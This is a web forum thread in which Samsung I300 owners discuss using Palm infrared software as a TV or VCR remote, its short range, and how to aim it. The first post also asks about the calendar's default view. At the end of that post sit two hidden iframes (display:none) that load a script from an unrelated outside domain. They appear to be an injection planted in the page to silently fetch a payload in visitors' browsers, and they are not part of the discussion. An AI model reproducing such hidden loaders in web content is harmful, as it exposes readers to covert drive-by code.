+ Reply to Thread

IR codes for I300?

Hi.. I was wondering if anyone has tried using ir codes in their Samsung I300 as a remote control for a tv or whatever? I have found this web site www.pacificneotek.com that has software you can load into your palm...then program it to act as a remote control. Anyone tried this yet?
    Also.. how do I get my calendar app to default to the monthly view instead of always opening to the day's view?
    thanks <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Even if it does work, the range will probably be very short.

I gave the neotek software a quick try. The range for me was about 6 feet. I need about 9 feet for it to be useful in my particular arrangement.

It was very capable of learning the commands from the various remotes I tried (receiver, TV, DVD, etc.).

Needless to say, the range has prevented me from using it. I plan to give the other major IR Palm software a try.
    http://hp.vector.co.jp/authors/VA005...n/premocce.htm

I would be interested in experiences from others. Some of the notes on the neotek site indicate that various devices can actually provide some decent ranges. Maybe we need to wait for an 'i300' specific version from neotek.

Holy Batmobile Batman!! I only need about 6" range

if the range is short, ill load it on anyway, as long as it works....jsut to have a remote in a pinch....cuz i ALWAYS seem to be losing mine.

I just got my I300 last week (glad I found this forum BTW!)

I had delusions of walking into my home and with one button turning on the home theater and all the lights.

Unfortunately with the short range, 6 feet as said earlier, I walk past all the switches past all my remotes in order to use my phone as the on button. Not very convienent.

I keep it on just for kicks though.

ny

Range vs. Aim

Actually, I found that I could control my VCR etc. from across the room, which has to be more than six feet -- probably 9-12. But the further you get, the harder it is to aim. From sitting back on the couch, very difficult; leaning forward, not too bad; standing in front of the couch, don't need to think about it.

-vave